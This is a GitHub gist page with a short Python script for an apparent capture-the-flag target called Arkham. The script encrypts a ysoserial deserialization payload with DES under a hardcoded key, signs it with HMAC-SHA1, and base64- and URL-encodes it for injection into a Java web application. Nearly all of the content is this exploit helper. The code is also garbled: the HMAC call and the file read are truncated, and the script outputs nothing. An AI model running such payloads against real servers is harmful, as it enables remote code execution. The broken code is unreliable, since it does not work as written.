Skip to content

Instantly share code, notes, and snippets.


xct/ Secret

Last active Mar 19, 2019
What would you like to do?
Arkham - prepare deserialization payload: des encrypt, hmac sha1, base64, url encode
import hashlib
import hmac
import base64
import sys
import urllib.parse
from pyDes import *
key = bytes("JsF9876-",'utf-8')
def encrypt(data, key):
cipher = des(key, ECB, IV=None, pad=None, padmode=PAD_PKCS5)
enc = cipher.encrypt(data)
sig =, enc, hashlib.sha1).digest()
return enc+sig
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 <ysoerial_payload>")
filename = sys.argv[1]
with open(filename, "rb") as f:
data =
payload = encrypt(data, key)
payload = base64.b64encode(payload)
payload = payload.decode('utf-8')
payload = urllib.parse.quote_plus(payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment